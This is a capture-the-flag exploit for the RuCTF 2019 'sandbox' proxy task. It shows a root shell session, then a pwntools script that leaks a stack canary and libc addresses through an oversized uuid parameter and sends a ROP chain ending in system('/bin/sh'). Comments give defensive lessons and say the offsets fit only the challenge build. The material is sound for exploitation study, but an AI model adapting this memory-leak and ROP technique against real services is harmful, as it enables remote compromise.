root@kali:/mnt/hgfs/f/sandbox/proxy# ./sandbox_rce.py
[+] Opening connection to 127.0.0.1 on port 16780: Done
[*] Closed connection to 127.0.0.1 port 16780
[+] Opening connection to 127.0.0.1 on port 16780: Done
Stack canary: 00667104293168fb proxy base: 0x5611dcb23000 libc base: 0x7ff23c8f9000
[*] Switching to interactive mode
foo\x00uuid\x0041414141414141414141414sh: turning off NDELAY mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ pwd
/root/proxy
$ ls -la
total 8140
drwxr-xr-x 1 root root 4096 Apr 29 21:49 .
drwx------ 1 root root 4096 Apr 29 21:45 ..
-rwxrwxrwx 1 root root 46 Apr 28 14:13 .gitignore
-rwxrwxrwx 1 root root 168 Apr 28 14:13 Dockerfile
-rwxrwxrwx 1 root root 494 Apr 28 14:13 Makefile
-rwxrwxrwx 1 root root 103 Apr 28 14:13 docker_build.sh
-rwxrwxrwx 1 root root 288 Apr 28 14:13 gen_hash.py
-rwxrwxrwx 1 root root 28 Apr 28 14:13 hash.h
-rwxrwxrwx 1 root root 8267 Apr 28 14:13 httpserver.cpp
-rwxrwxrwx 1 root root 4619 Apr 28 14:13 httpserver.h
-rwxrwxrwx 1 root root 569 Apr 28 14:13 interface.h
-rwxr-xr-x 1 root root 2030544 Apr 29 21:45 libc.so.6
-rwxrwxrwx 1 root root 30768 Apr 29 17:31 libinterface.so
-rwxrwxrwx 1 root root 4302 Apr 28 14:13 main.cpp
-rwxrwxrwx 1 root root 452976 Apr 28 14:20 proxy
$
Sandbox ROP RCE (ructf 2019)
#!/usr/bin/python
# Proof-of-concept for the RuCTF 2019 "sandbox" proxy task (Python 2 + pwntools).
#
# What the script demonstrates, as far as its own lines show: an over-long
# hex-encoded `uuid` query parameter makes the service (a) return raw memory in
# its reply, from which a stack canary plus a binary and a libc pointer are
# recovered, and (b) on a second request, accept a canary-prefixed ROP chain
# that ends in a shell running as root (see the session transcript above).
#
# Defensive takeaways grounded in this behaviour:
#   * bounds-check the decoded `uuid` length against its destination buffer and
#     never echo buffer contents back to the client -- without the disclosure,
#     the stack protector and ASLR would not have been bypassable this way;
#   * the proxy ran as uid 0 inside the container, so a memory-safety bug became
#     full compromise; run it as an unprivileged user;
#   * in HTTP logs this looks like a request with several hundred hex characters
#     in a single query parameter followed by a 0x400-byte binary reply, which
#     is cheap to alert on.
#
# The gadget and function offsets below are tied to the challenge's exact
# proxy and libc builds and are meaningless against any other binary.
from pwn import *
host = args.HOST or "127.0.0.1"
port = args.PORT or "16780"
io = remote(host, port)
# Stage 1 (disclosure): the p32(4) / p64(0x3ff) fields presumably overwrite a
# length value so the reply includes data past the buffer -- TODO confirm
# against httpserver.cpp / interface.h listed in the transcript.
payload = "A"*52 + p32(4) + "A"*4 + p64(0x3ff)
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n"
+ "Host: 127.0.0.1:16780\r\n"
+ "User-Agent: curl/7.64.0\r\n"
+ "Accept: */*\r\n"
+ "Content-Length: 0\r\n"
+ "\r\n")
# Up to 0x400 bytes of reply; the slice offsets are where the canary and the
# two pointers happened to sit in the challenge build.
leak = io.recvrepeat(0x400)
io.close()
io = remote(host, port)
stack_canary = leak[0x48:0x50]
proxyBase = u64(leak[0x58:0x60]) - 0x3C3D
libcBase = u64(leak[0x2c8:0x2d0]) - 0x130EA6
print "Stack canary:", enhex(stack_canary), "proxy base:", hex(proxyBase), "libc base:", hex(libcBase)
# Stage 2 (control-flow hijack): three dup2(4, fd) calls followed by
# system("/bin/sh"); fd 4 is presumably the client socket -- TODO confirm.
rop = ""
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(0)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(1)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(2)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(libcBase + 0x01B3E9A)#"/bin/sh"
rop += p64(libcBase + 0x4F440)#system
# Same layout as stage 1, but the leaked canary is put back in place so the
# stack protector check passes; the 8 "B" bytes fill the saved frame pointer
# slot before the chain.
payload = "A"*52 + p32(4) + "A"*4 + p64(0) + stack_canary + "B"*8 + rop
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n"
+ "Host: 127.0.0.1:16780\r\n"
+ "User-Agent: curl/7.64.0\r\n"
+ "Accept: */*\r\n"
+ "Content-Length: 0\r\n"
+ "\r\n")
io.interactive()
Агонь!